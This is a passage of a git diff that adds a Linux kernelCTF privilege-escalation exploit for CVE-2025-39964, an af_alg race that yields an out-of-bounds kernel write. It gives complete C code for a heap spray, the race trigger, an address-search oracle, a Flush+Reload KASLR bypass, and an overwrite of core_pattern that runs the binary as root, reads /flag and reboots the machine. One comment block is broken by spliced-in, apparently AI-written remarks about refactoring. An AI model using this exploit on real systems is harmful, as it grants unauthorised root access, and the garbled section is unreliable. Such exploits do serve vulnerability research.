close(tfmfd); + return 1; + } + + opfd = accept(tfmfd, NULL, 0); + if (opfd == -1) { + perror("accept"); + close(tfmfd); + return 1; + } + + int val = 0x1000; + + struct { + struct cmsghdr cmsg; + __u32 op; + __u32 ivlen; + unsigned char iv[16]; + } __attribute__((__packed__)) msg; + + memset(&msg, 0, sizeof(msg)); + msg.cmsg.cmsg_level = SOL_ALG; + msg.cmsg.cmsg_type = ALG_SET_OP; + msg.cmsg.cmsg_len = CMSG_LEN(sizeof(__u32) + sizeof(__u32) + 16); + + msg.op = ALG_OP_ENCRYPT; + msg.ivlen = 16; + memset(msg.iv, 0x01, 16); + + struct iovec iov = { + .iov_base = buf, + .iov_len = 0x1000, + }; + + struct msghdr msgh; + memset(&msgh, 0, sizeof(msgh)); + msgh.msg_iov = &iov; + msgh.msg_iovlen = 1; + msgh.msg_control = &msg; + msgh.msg_controllen = msg.cmsg.cmsg_len; + + /* Step 3: initial sendmsg to initialise the tsgl; advances sgl->cur to 1 */ + ssize_t n = sendmsg(opfd, &msgh, MSG_MORE); + printf("init %ld\n", n); + + /* + * Step 3 (cont): advance sgl->cur from 1 to 124 (MAX_SGL_ENTS - 2) using + * SGL_MERGE_ITERATIONS = 0x7b send+recv pairs. Each send allocates one sg + * entry (cur++); each recv drains the processed entry so the socket stays + * writable. The loop comment in the original PR is: + * "the loop with 0x7b + the sendmsg and send calls executes 125 times, + * matching MAX_SGL_ENTS - 1 = 126 - 1 = 125." + */ + for (int i = 0; i < SGL_MERGE_ITERATIONS; i++) { + SYSCHK(send(opfd, buf, 0x1000, MSG_MORE)); + n = recv(opfd, buf, 0x1000, 0); + } + + /* Advance sgl->cur to 125 = MAX_SGL_ENTS - 1 (one slot before the list is + * full) */ + send(opfd, buf, 0x1000, MSG_MORE); + SYSCHK(setsockopt(opfd, SOL_SOCKET, SO_SNDBUF, &val, sizeof(val))); + printf("setsockopt done\n"); + + /* + * Step 3 (race): fork two children that race each other: + * + * Child A (send invalid addr): passes INVALID_USER_ADDR, which causes + * af_alg_alloc_tsgl() to allocate a new tsgl (sgl->cur → 0) then fail + * in memcpy_from_msg() — leaving ctx->merge = 1 and sgl->cur = 0. + * + * Child B (send 0x200 bytes): sends a sub-page-size buffer so that + * ctx->merge is set to 1 and sgl->cur advances to MAX_SGL_ENTS = 126. + * + * Desired outcome: both children finish such that ctx->merge == 1 AND the + * last tsgl has sgl->cur == 0. The next send() will then use sg[-1]. + */ + if (fork() == 0) { + /* Child A: trigger new-tsgl allocation then fail — sets sgl->cur = 0 */ + int x = send(opfd, INVALID_USER_ADDR, 0x400, MSG_MORE); + printf("send3 %d\n", x); + exit(0); + } + + if (fork() == 0) { + /* Child B: sub-page send sets ctx->merge = 1 and fills sgl->cur to + * MAX_SGL_ENTS */ + int x = send(opfd, buf, 0x200, MSG_MORE); + printf("send2 %d\n", x); + exit(0); + } + + /* + * @sleep(desc="wait for both fork children to reach their send() calls and + * set ctx->merge=1 with sgl->cur=0 before we recv()") + */ + sleep(1); + n = recv(opfd, buf, 0x1000, 0); + printf("recv2 %ld\n", n); + wait(NULL); + + /* Step 4: release spray threads so they re-send their crafted payloads */ + for (int i = 0; i < THREAD_NUM; i++) { + write(cfd[1], buf, 1); + } + + n = recv(opfd, buf, 0x1000, 0); + printf("recv2 %ld\n", n); + + memset(buf, 'z', 0x1000); + wait(NULL); + + /* Step 5: map userspace oracle region for the binary search */ + allocate_map(); + + /* Step 5 (OOB trigger): with ctx->merge=1 and sgl->cur=0 this send uses + * sg[-1].page_link from our sprayed payload — triggering the OOB write. + * Returns -1 if the write destination is unmapped (race failed); 1 if mapped. + */ + int x = send(opfd, buf, 1, MSG_MORE); + + if (x == 1) { + puts("Race fail"); + exit(0); + } + + /* + * Step 5 (binary search oracle): + * + * Background: + * sg[-1].page_link is effectively a pointer to a struct page in vmemmap. + * The kernel computes the write destination as: + * dest = page_address(sg_page(sg)) + sg->offset + sg->length + * = page_offset_base + (page_link - vmemmap_base) / 64 * PAGE_SIZE + * + offset + length + * With page_link ≈ 0, the pfn arithmetic wraps to a very large value, and + * (page_offset_base + pfn * PAGE_SIZE) wraps further to land within our + * userspace oracle region [SCAN_START_ADDR, SCAN_END_ADDR). + * + * Oracle: + * send() returns 1 → the write destination is in a mapped page (success). + * send() returns -1 → the destination is unmapped (copy_from_user failed). + * By progressively munmap-ing halves of the oracle region we can determine + * which physical page corresponds to the OOB write target. + * + * Binary search (8 iterations → narrows range from SCAN_END_ADDR to ~340 MB): +` + +The user wants to refactor the explanation. + +Let's try to fit the user's text into the comment block. + +```c + * Each iteration j tests: "if I decrease page_link by half_range/64, does + * (Note: /64 is a simplification of the formula (addr / 0x1000) * 64. We + * divide the address by 0x1000 to find the page index, and then multiply + * by 64 because each memory page has a page_struct that is exactly 64 + * bytes long)" +``` + +However, the context already has: +`* the write still succeed + * the write still succeed?" + * - Decreasing page_link by Δ shifts dest by Δ*64 bytes (since each + * struct-page unit = 64 bytes = one PAGE_SIZE/64 step in physmap). + * - The test delta (SCAN_END_ADDR >> (7+j)) in page_link units equals + * half_range = (SCAN_END_ADDR >> (1+j)) in dest-address units. + * If the shifted oracle still succeeds → dest is in the *upper* half → + * unmap the lower half and advance start. + * Otherwise → dest is in the *lower* half → unmap the upper half. + */ + size_t oracle; + size_t leak_offset = 0; + int xcnt = 0; + for (int k = 0; k < MAX_SCAN_ITERATIONS; k++) { + for (int i = 0; i < THREAD_NUM; i++) { + read(sfd[i][0], buf, 0x1000); + read(cfd[1], buf, 1); + } + *(size_t *)&payload[PAYLOAD_OFFS_TARGET] -= (SCAN_END_ADDR >> 6); + write(cfd[1], buf, 0x100); + buf[0] = 'a'; + x = send(opfd, buf, 1, MSG_MORE); + if (x == 1) { + puts(""); + xcnt++; + oracle = *(size_t *)&payload[PAYLOAD_OFFS_TARGET]; + char *start = (void *)(0ULL); + for (int j = 0; j < 8; j++) { + printf("loop j: %d\n", j); + x = guess_addr(oracle - (SCAN_END_ADDR >> (7 + j))); + if (x == 1) { + xcnt++; + start += (SCAN_END_ADDR >> (1 + j)); /* upper half */ + munmap(start - (SCAN_END_ADDR >> (1 + j)), + (SCAN_END_ADDR >> (1 + j))); + } else { + munmap(start + (SCAN_END_ADDR >> (1 + j)), + (SCAN_END_ADDR >> (1 + j))); + } + } + *(size_t *)&payload[PAYLOAD_OFFS_TARGET] = oracle; + /* search_offset returns the exact userspace VA of the OOB-written page */ + leak_offset = search_offset(start) + xcnt; + printf("leak_offset %zx\n", leak_offset); + printf("%zx\n", *(size_t *)&payload[PAYLOAD_OFFS_TARGET]); + + break; + } + } + + if (leak_offset == 0) + exit(0); + + for (int i = 0; i < THREAD_NUM; i++) { + read(sfd[i][0], buf, 0x1000); + read(cfd[1], buf, 1); + } + *(size_t *)&payload[PAYLOAD_OFFS_TARGET] = oracle; + write(cfd[1], buf, 0x100); + + /* + * Step 6: redirect the OOB write to core_pattern. + * + * leak_offset is the VA of the currently-targeted physical page. + * core_pattern is the KASLR-adjusted kernel VA of core_pattern[]. + * + * First, align within-page: send adjust_offset bytes so that after the + * advance the write starts at the same within-page offset as core_pattern. + */ + size_t adjust_offset = + PAGE_SIZE + (core_pattern & PAGE_MASK) - (leak_offset & PAGE_MASK); + leak_offset += adjust_offset; + + memset(buf, 'z', 0x1000); + SYSCHK(send(opfd, buf, adjust_offset - 1, MSG_MORE)); + SYSCHK(send(opfd, buf, 1, MSG_MORE)); + + printf("sg->len overflow check %x\n", *(char *)(leak_offset - 1)); + if (*(char *)(leak_offset - 1) != 'z') + leak_offset -= 0x100000000ULL; + + for (int i = 0; i < THREAD_NUM; i++) { + read(sfd[i][0], buf, 0x1000); + read(cfd[1], buf, 1); + } + + /* + * Now adjust payload[PAYLOAD_OFFS_TARGET] (= sg[-1].page_link) so that + * page_address(sg_page(sg)) points to the physical page holding core_pattern. + * The >> 6 (or / 64) is actually a simplification of the formula + * (addr / 0x1000) * 64. We divide the address by 0x1000 to find the page + * index, and then multiply by 64 because each memory page has a page_struct + * that is exactly 64 bytes long. + * payload[PAYLOAD_OFFS_TARGET] is sg[-1].page_link, which controls dest via + * the formula described in the binary search comment above. + */ + *(size_t *)&payload[PAYLOAD_OFFS_TARGET] += + (((core_pattern & ~PAGE_MASK) - (leak_offset & ~PAGE_MASK)) >> 6); + printf("%zx\n", *(size_t *)&payload[PAYLOAD_OFFS_TARGET]); + write(cfd[1], buf, 0x100); + /* Step 6 (write): send the core_pattern string; kernel copies it to + * core_pattern[] */ + char mcore[64] = "|/proc/%P/fd/666 %P"; + SYSCHK(send(opfd, mcore, 64, MSG_MORE)); + PAUSE; + + return 0; +} + +inline __attribute__((always_inline)) uint64_t rdtsc_begin() { + uint64_t a, d; + asm volatile("mfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "xor %%rax, %%rax\n\t" + "lfence\n\t" + : "=r"(d), "=r"(a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + a = (d << 32) | a; + return a; +} + +inline __attribute__((always_inline)) uint64_t rdtsc_end() { + uint64_t a, d; + asm volatile("xor %%rax, %%rax\n\t" + "lfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "mfence\n\t" + : "=r"(d), "=r"(a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + a = (d << 32) | a; + return a; +} + +void prefetch(void *p) { + asm volatile("prefetchnta (%0)\n" + "prefetcht2 (%0)\n" + : + : "r"(p)); +} + +size_t flushandreload(void *addr) /* row miss */ +{ + size_t time = rdtsc_begin(); + prefetch(addr); + size_t delta = rdtsc_end() - time; + return delta; +} + +/* + * KASLR bypass via Flush+Reload side channel. + * + * Uncomment KASLR_BYPASS_INTEL for Intel CPUs (kernelCTF remote instances). + * Keep commented for GitHub CI (AMD/other) to use the sliding-window variant. + * Alternatively pass -DKASLR_BYPASS_INTEL to the compiler without touching + * source. + */ +// #define KASLR_BYPASS_INTEL +size_t bypass_kaslr(u64 base) { + if (!base) { +#ifdef KASLR_BYPASS_INTEL +#define OFFSET 0 +#define START (0xffffffff81000000ull + OFFSET) +#define END (0xffffffffD0000000ull + OFFSET) +#define STEP 0x0000000001000000ull + while (1) { + u64 bases[7] = {0}; + for (int vote = 0; vote < ARRAY_LEN(bases); vote++) { + size_t times[(END - START) / STEP] = {}; + uint64_t addrs[(END - START) / STEP]; + + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + times[ti] = ~0; + addrs[ti] = START + STEP * (u64)ti; + } + + for (int i = 0; i < 16; i++) { + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + u64 addr = addrs[ti]; + size_t t = flushandreload((void *)addr); + if (t < times[ti]) { + times[ti] = t; + } + } + } + + size_t minv = ~0; + size_t mini = -1; + for (int ti = 0; ti < ARRAY_LEN(times) - 1; ti++) { + if (times[ti] < minv) { + mini = ti; + minv = times[ti]; + } + } + + if (mini < 0) { + return -1; + } + + bases[vote] = addrs[mini]; + } + + int c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) { + if (c == 0) { + base = bases[i]; + } else if (base == bases[i]) { + c++; + } else { + c--; + } + } + + c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) { + if (base == bases[i]) { + c++; + } + } + if (c > ARRAY_LEN(bases) / 2) { + base -= OFFSET; + goto got_base; + } + + printf("majority vote failed:\n"); + printf("base = %llx with %d votes\n", base, c); + } +#else +#define START (0xffffffff81000000ull) +#define END (0xffffffffc0000000ull) +#define STEP 0x0000000000200000ull +#define NUM_TRIALS 9 +/* largest contiguous mapped area at the beginning of _stext */ +#define WINDOW_SIZE 11 + + while (1) { + u64 bases[NUM_TRIALS] = {0}; + + for (int vote = 0; vote < ARRAY_LEN(bases); vote++) { + size_t times[(END - START) / STEP] = {}; + uint64_t addrs[(END - START) / STEP]; + + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + times[ti] = ~0; + addrs[ti] = START + STEP * (u64)ti; + } + + for (int i = 0; i < 16; i++) { + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + u64 addr = addrs[ti]; + size_t t = flushandreload((void *)addr); + if (t < times[ti]) { + times[ti] = t; + } + } + } + + uint64_t max = 0; + int max_i = 0; + for (int ti = 0; ti < ARRAY_LEN(times) - WINDOW_SIZE; ti++) { + uint64_t sum = 0; + for (int i = 0; i < WINDOW_SIZE; i++) { + sum += times[ti + i]; + } + if (sum > max) { + max = sum; + max_i = ti; + } + } + + bases[vote] = addrs[max_i]; + } + + int c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) { + if (c == 0) { + base = bases[i]; + } else if (base == bases[i]) { + c++; + } else { + c--; + } + } + + c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) { + if (base == bases[i]) { + c++; + } + } + if (c > ARRAY_LEN(bases) / 2) { + goto got_base; + } + + printf("majority vote failed:\n"); + printf("base = %llx with %d votes\n", base, c); + } +#endif + } + +got_base: + + printf("using kernel base %llx\n", base); + + return base; +} diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/mitigation-v4-6.6/Makefile b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/mitigation-v4-6.6/Makefile new file mode 100644 index 000000000..3eabaca61 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/mitigation-v4-6.6/Makefile @@ -0,0 +1,5 @@ +all: exploit + +exploit: exploit.c + gcc -static-pie -o exploit exploit.c + diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/mitigation-v4-6.6/exploit b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/mitigation-v4-6.6/exploit new file mode 100755 index 000000000..a06f17248 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/mitigation-v4-6.6/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/mitigation-v4-6.6/exploit.c b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/mitigation-v4-6.6/exploit.c new file mode 100644 index 000000000..3c109bbd3 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/mitigation-v4-6.6/exploit.c @@ -0,0 +1,893 @@ +/* + * Exploit for CVE-2025-39964 — Linux af_alg out-of-bounds write + * (mitigation-v4-6.6) + * + * Vulnerability: af_alg_sendmsg() has a race condition allowing two concurrent + * sendmsg calls to produce ctx->merge=1 with sgl->cur=0 simultaneously. + * In this state the merge branch computes sg = sgl->sg + sgl->cur - 1 = sg[-1], + * which is an out-of-bounds read into the previous heap chunk. The + * sg[-1].page_link value from the previous chunk controls the destination of + * memcpy_from_msg(), giving an arbitrary kernel write primitive. + * + * Exploit chain (mitigation-v4-6.6): + * 1. Spray 0x100 AF_UNIX socket pairs; each thread sends a crafted msghdr + * whose msg_control (payload[]) lands in the heap slot just before an + * af_alg_tsgl. payload[PAYLOAD_OFFS_TARGET] controls sg[-1].page_link = write + * destination. + * 2. Set up an AF_ALG socket (AES-CBC); advance sgl->cur to MAX_SGL_ENTS-1 = + * 125 using 1 sendmsg + SGL_MERGE_ITERATIONS send/recv pairs + 1 more send. + * 3. Fork two children that race: one sets ctx->merge=1 + * (sgl->cur→MAX_SGL_ENTS), the other allocates a new sgl (sgl->cur→0) via an + * invalid userspace pointer. + * 4. With ctx->merge=1 and sgl->cur=0, the next sendmsg triggers the OOB write + * to the address derived from payload[PAYLOAD_OFFS_TARGET]. + * 5. Map [SCAN_START_ADDR, SCAN_END_ADDR) in MAP_CHUNK_SIZE (2 GB) chunks so + * the OOB write destination (which wraps into userspace due to page_link + * arithmetic) falls in a mapped region. An 8-step binary search (oracle = + * send() return value) narrows the target to a ~340 MB window; mincore then + * locates the exact page. + * 6. Adjust the write destination via page_link arithmetic to point to the + * core_pattern kernel symbol, then write "|/proc/%P/fd/666 %P". + * 7. A forked child watches for core_pattern to change, then faults (NULL + * deref), causing the kernel to execute our binary as root via core_pattern. + * 8. Re-exec reads /flag via pidfd_getfd() on the parent's stdio descriptors. + */ + +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#ifndef SYS_pidfd_getfd +#define SYS_pidfd_getfd 438 +#endif + +#ifndef SYS_pidfd_open +#define SYS_pidfd_open 434 +#endif + +size_t vmemmap_base = 0xffffea0000000000ULL; +size_t page_offset_base = 0xffff888000000000ULL; +size_t core_pattern = 0xffffffff8420d520ULL; + +/* Socket options */ +#define ALG_SET_KEY 1 +#define ALG_SET_IV 2 +#define ALG_SET_OP 3 +#define ALG_SET_AEAD_ASSOCLEN 4 +#define ALG_SET_AEAD_AUTHSIZE 5 +#define ALG_SET_DRBG_ENTROPY 6 +#define ALG_SET_KEY_BY_KEY_SERIAL 7 + +/* Operations */ +#define ALG_OP_DECRYPT 0 +#define ALG_OP_ENCRYPT 1 + +typedef unsigned char u8; +typedef unsigned short u16; +typedef unsigned int u32; +typedef unsigned long long u64; +typedef char i8; +typedef short i16; +typedef int i32; +typedef long long i64; +#define ARRAY_LEN(x) (sizeof(x) / sizeof(x[0])) + +#define __u32 uint32_t +#define __u16 uint16_t +#define __u8 uint8_t +#define PAUSE \ + { \ + int x; \ + printf(":"); \ + read(0, &x, 1); \ + } + +#define SYSCHK(x) \ + ({ \ + typeof(x) __res = (x); \ + if (__res == (typeof(x))-1) \ + err(1, "SYSCHK(" #x ")"); \ + __res; \ + }) + +#ifndef SYS_process_vm_readv +#define SYS_process_vm_readv 310 +#endif + +/* Number of AF_UNIX pairs to spray; one pair per exploit thread */ +#define THREAD_NUM 0x100 + +/* + * Size of each private anonymous mapping used as the OOB write oracle region: + * 512 PTEs per page * PAGE_SIZE = 2 MB physical coverage per mmap entry. + */ +#define MMAP_REGION_LEN (0x1000 / 8 * 0x1000) + +/* + * Start of the contiguous userspace region we map for the binary-search oracle. + * We start just above the 4 GB boundary to avoid the low userspace region. + */ +#define SCAN_START_ADDR 0x100000000ULL + +/* Maximum number of mincore windows tried during the page-address scan */ +#define MAX_SCAN_ITERATIONS 0x50 + +/* + * Unmapped address passed as invalid user pointer to trigger the race + * condition: the first 4 MB of virtual address space (0–0xfff000) is always + * unmapped. + */ +#define INVALID_USER_ADDR ((void *)0xfff000) + +/* + * Byte offset of sg[-1].page_link inside the sprayed msg_control payload: + * af_alg_tsgl is allocated in a 4096-byte slab object. + * sgl->sg[0] starts at byte 24 (sizeof(af_alg_tsgl)). + * sg[-1] = sgl->sg[-1] lies 32 bytes (sizeof(scatterlist)) before sg[0], + * i.e. at byte 24 - 32 = -8 relative to the tsgl object start. + * In the *previous* 4096-byte heap object that is offset 4096 - 8 = 0xff8. + * scatterlist.page_link is the first field (offset 0), so payload[0xff8] + * directly controls the page_link that the OOB write uses as its destination. + */ +#define PAYLOAD_OFFS_TARGET 0xff8 + +/* + * Number of send/recv iterations to advance sgl->cur from 1 to 124 + * (MAX_SGL_ENTS-2). MAX_SGL_ENTS = (4096 - sizeof(af_alg_tsgl)) / + * sizeof(scatterlist) - 1 = (4096 - 24) / 32 - 1 = 126. One initial sendmsg + * sets cur=1; SGL_MERGE_ITERATIONS send+recv pairs bring it to 1 + 0x7b = 124; + * one more send brings it to 125 = MAX_SGL_ENTS - 1. + */ +#define SGL_MERGE_ITERATIONS 0x7b + +/* Compile-time unslid base of kernel text (_stext); used when computing symbol + * offsets */ +#define KERNEL_TEXT_BASE 0xffffffff81000000UL + +/* + * KASLR-invariant offset of core_pattern from _stext in mitigation-v4-6.6. + * core_pattern is at 0xffffffff83db3720; _stext is at KERNEL_TEXT_BASE. + */ +#define CORE_PATTERN_MIT_OFFSET (0xffffffff83db3720UL - KERNEL_TEXT_BASE) + +/* + * The mitigation kernel's physmap base is shifted up by 4 GB relative to + * LTS/COS. This additional page_link adjustment (4 GB / 64 = 0x4000000) + * is applied statically rather than via a runtime environment variable. + */ +#define MITIGATION_PHYSMAP_EXTRA_OFFSET (0x100000000ULL >> 6) + +/* Upper bound of the userspace oracle scan region [SCAN_START_ADDR, + * SCAN_END_ADDR) */ +#define SCAN_END_ADDR 0x500000000000ULL + +/* Size of each anonymous 2 GB mmap chunk used to cover the oracle region */ +#define MAP_CHUNK_SIZE 0x80000000ULL + +#ifndef PAGE_SIZE +#define PAGE_SIZE 0x1000 +#endif +/* Page offset mask for within-page alignment (PAGE_SIZE - 1) */ +#define PAGE_MASK (PAGE_SIZE - 1) + +pthread_t tid[THREAD_NUM]; + +/* Shared scratch buffer used by spray threads and the main exploit loop */ +char buf[0x10000]; +char vec[0x100000]; + +int cfd[2]; +int sfd[THREAD_NUM][2]; +char payload[0x1000]; +int opfd; + +struct sockaddr_alg { + __u16 salg_family; + __u8 salg_type[14]; + __u32 salg_feat; + __u32 salg_mask; + __u8 salg_name[64]; +}; + +void set_cpu(int i) { + cpu_set_t mask; + CPU_ZERO(&mask); + CPU_SET(i, &mask); + sched_setaffinity(0, sizeof(mask), &mask); +} + +void *spray_send_thread(void *x) { + size_t idx = (size_t)x; + write(cfd[0], buf, 1); + read(cfd[0], buf, 1); + struct iovec iov = {buf, 0x1000}; + struct msghdr mhdr = {.msg_iov = &iov, + .msg_iovlen = 1, + .msg_control = payload, + .msg_controllen = 0x1000}; + while (1) { + sendmsg(sfd[idx][1], &mhdr, 0); + write(cfd[0], buf, 1); + read(cfd[0], buf, 1); + } +} + +/* + * Step 1: Spray THREAD_NUM AF_UNIX socket pairs, each sending a crafted msghdr + * whose msg_control buffer (payload[]) will occupy the heap slot immediately + * preceding an af_alg_tsgl allocation. payload[PAYLOAD_OFFS_TARGET] then + * aliases sg[-1].page_link and controls the OOB write destination. + */ +void spray_unix_sockets() { + memset(payload, 'a', 0x1000); + struct cmsghdr *first; + first = (struct cmsghdr *)payload; + first->cmsg_len = 0x1000; + first->cmsg_level = + 0; /* must differ from SOL_SOCKET=1 to skip cmsg processing */ + first->cmsg_type = 0x41414141; /* dummy filler value */ + /* Initially zero; the binary search will update this to guide the OOB write + */ + *(size_t *)&payload[PAYLOAD_OFFS_TARGET] = 0; + + for (int i = 0; i < THREAD_NUM; i++) { + SYSCHK(socketpair(AF_UNIX, SOCK_DGRAM, 0, sfd[i])); + int n = 0x800; + setsockopt(sfd[i][1], SOL_SOCKET, SO_SNDBUF, (char *)&n, sizeof(n)); + setsockopt(sfd[i][0], SOL_SOCKET, SO_RCVBUF, (char *)&n, sizeof(n)); + write(sfd[i][1], buf, 0x1000); + } + + for (int i = 0; i < THREAD_NUM; i++) + pthread_create(&tid[i], 0, spray_send_thread, (void *)(size_t)i); + + for (int i = 0; i < THREAD_NUM; i++) + read(cfd[1], buf, 1); +} + +/* + * Step 5a: Map the full userspace range [SCAN_START_ADDR, SCAN_END_ADDR) with + * physical pages in MAP_CHUNK_SIZE (2 GB) chunks. When sg[-1].page_link is + * crafted with a value near 0, the kernel's page_address() computation wraps + * around and the OOB write destination lands somewhere within this region. + * Mapping real pages here means the write silently succeeds (our oracle), + * letting us binary-search for the exact physical page by progressively + * munmap-ing halves of this range. + */ +void allocate_map() { + char *start = (void *)SCAN_START_ADDR; + while (1) { + start = SYSCHK(mmap(start, MAP_CHUNK_SIZE, PROT_READ | PROT_WRITE, + MAP_SHARED | MAP_ANON | MAP_FIXED, -1, 0)); + start += MAP_CHUNK_SIZE; + if ((size_t)start >= SCAN_END_ADDR) + break; + } +} + +/* + * Step 5b: Use mincore to find the exact virtual address in [start, start+4GB) + * that corresponds to the physical page the OOB write targets. A page marked + * resident (mincore bit = 1) that also contains our spray marker ('a') is the + * hit: it is the page that the kernel's arbitrary-write wrote into. + */ +size_t search_offset(char *start) { + char *pvec = NULL; + for (int i = 0; i < MAX_SCAN_ITERATIONS; i++) { + mincore((void *)start, 0x100000000ULL, vec); + pvec = memchr(vec, 1, 0x100000); + if (pvec) { + char *leak_offset = start + (pvec - vec) * 0x1000; + pvec = memchr((void *)leak_offset, 'a', 0x1000); + if (pvec) + break; + } + start += 0x100000000ULL; + } + if (pvec == NULL) + exit(0); + printf("\npvec %p %x\n", pvec, pvec[0]); + return (size_t)pvec; +} + +int check_core() { + /* Check if /proc/sys/kernel/core_pattern has been overwritten */ + char core_pattern_buf[0x100] = {}; + int core = open("/proc/sys/kernel/core_pattern", O_RDONLY); + read(core, core_pattern_buf, sizeof(core_pattern_buf)); + close(core); + return strncmp(core_pattern_buf, "|/proc/%P/fd/666", 0x10) == 0; +} + +void crash(char *cmd) { + int memfd = memfd_create("", 0); + /* send our binary to memfd for core_pattern payload */ + SYSCHK(sendfile(memfd, open("/proc/self/exe", 0), 0, 0xffffffff)); + /* our binary now at file descriptor 666 */ + dup2(memfd, 666); + close(memfd); + while (check_core() == 0) + sleep(1); + puts("Root shell !!"); + /* Trigger program crash and cause kernel to execute program from core_pattern + * which is our "root" binary */ + *(size_t *)0 = 0; +} + +size_t bypass_kaslr(u64 base); + +int guess_addr(size_t guesss) { + for (int i = 0; i < THREAD_NUM; i++) { + read(sfd[i][0], buf, 0x1000); + read(cfd[1], buf, 1); + } + *(size_t *)&payload[PAYLOAD_OFFS_TARGET] = guesss; + write(cfd[1], buf, 0x100); + buf[0] = 'b'; + int x = send(opfd, buf, 1, MSG_MORE); + printf("x: %d\n", x); + return x == 1; +} + +int trigger_exploit(); +int main(int argc, char **argv) { + + setvbuf(stdin, 0, 2, 0); + setvbuf(stdout, 0, 2, 0); + puts("Exploit start"); + if (argc == 1) { + size_t stext = 0; + if (getenv("KTEXT")) + stext = strtoull(getenv("KTEXT"), 0, 16); + else + stext = bypass_kaslr(0); + /* core_pattern symbol is at a fixed offset from _stext */ + core_pattern = stext + CORE_PATTERN_MIT_OFFSET; + printf("got stext 0x%zx 0x%zx\n", stext, core_pattern); + } + + struct rlimit rlim = {.rlim_cur = 0xf000, .rlim_max = 0xf000}; + setrlimit(RLIMIT_NOFILE, &rlim); + + if (argc > 1) { +#define SYS_pidfd_getfd 438 + int pid = strtoull(argv[1], 0, 10); + int pfd = syscall(SYS_pidfd_open, pid, 0); + int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0); + int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0); + int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0); + dup2(stdinfd, 0); + dup2(stdoutfd, 1); + dup2(stderrfd, 2); + /* Run cat /flag multiple times to ensure output is flushed before reboot */ + for (int i = 0; i < 6; i++) + system("cat /flag"); + + system("cat /flag;echo o>/proc/sysrq-trigger"); + execlp("bash", "bash", NULL); + } + /* Step 7: fork a watcher that polls core_pattern and triggers crash once + * overwritten */ + if (fork() == 0) { + set_cpu(0); + setsid(); + crash(""); + } + /* Retry loop: trigger_exploit() may fail the race; restart on failure */ + while (1) { + if (fork() == 0) { + trigger_exploit(); + exit(0); + } + wait(NULL); + } +} + +int trigger_exploit() { + int tfmfd; + + set_cpu(1); + SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, cfd)); + + /* Step 1: spray heap with crafted msg_control buffers */ + spray_unix_sockets(); + + char *addr = SYSCHK(mmap(0, MMAP_REGION_LEN, PROT_READ | PROT_WRITE, + MAP_PRIVATE | MAP_ANON, -1, 0)); + struct iovec local = {.iov_base = addr, .iov_len = MMAP_REGION_LEN}; + struct iovec remote = {.iov_base = addr, .iov_len = MMAP_REGION_LEN}; + + struct sockaddr_alg sa = { + .salg_family = AF_ALG, + .salg_type = "skcipher", /* symmetric key cipher */ + .salg_name = "cbc(aes)", /* AES in CBC mode */ + }; + + /* Step 2: create and bind the AF_ALG transformation socket */ + tfmfd = socket(AF_ALG, SOCK_SEQPACKET, 0); + if (tfmfd == -1) { + perror("socket"); + return 1; + } + + if (bind(tfmfd, (struct sockaddr *)&sa, sizeof(sa)) != 0) { + perror("bind"); + close(tfmfd); + return 1; + } + + unsigned char key[32] = {0}; + if (setsockopt(tfmfd, SOL_ALG, ALG_SET_KEY, key, sizeof(key)) != 0) { + perror("setsockopt"); + close(tfmfd); + return 1; + } + + opfd = accept(tfmfd, NULL, 0); + if (opfd == -1) { + perror("accept"); + close(tfmfd); + return 1; + } + + int val = 0x1000; + + struct { + struct cmsghdr cmsg; + __u32 op; + __u32 ivlen; + unsigned char iv[16]; + } __attribute__((__packed__)) msg; + + memset(&msg, 0, sizeof(msg)); + msg.cmsg.cmsg_level = SOL_ALG; + msg.cmsg.cmsg_type = ALG_SET_OP; + msg.cmsg.cmsg_len = CMSG_LEN(sizeof(__u32) + sizeof(__u32) + 16); + + msg.op = ALG_OP_ENCRYPT; + msg.ivlen = 16; + memset(msg.iv, 0x01, 16); + + struct iovec iov = { + .iov_base = buf, + .iov_len = 0x1000, + }; + + struct msghdr msgh; + memset(&msgh, 0, sizeof(msgh)); + msgh.msg_iov = &iov; + msgh.msg_iovlen = 1; + msgh.msg_control = &msg; + msgh.msg_controllen = msg.cmsg.cmsg_len; + + /* Step 3: initial sendmsg to initialise the tsgl; advances sgl->cur to 1 */ + ssize_t n = sendmsg(opfd, &msgh, MSG_MORE); + printf("init %ld\n", n); + + /* + * Step 3 (cont): advance sgl->cur from 1 to 124 (MAX_SGL_ENTS - 2) using + * SGL_MERGE_ITERATIONS = 0x7b send+recv pairs. Each send allocates one sg + * entry (cur++); each recv drains the processed entry so the socket stays + * writable. The loop comment in the original PR is: + * "the loop with 0x7b + the sendmsg and send calls executes 125 times, + * matching MAX_SGL_ENTS - 1 = 126 - 1 = 125." + */ + for (int i = 0; i < SGL_MERGE_ITERATIONS; i++) { + SYSCHK(send(opfd, buf, 0x1000, 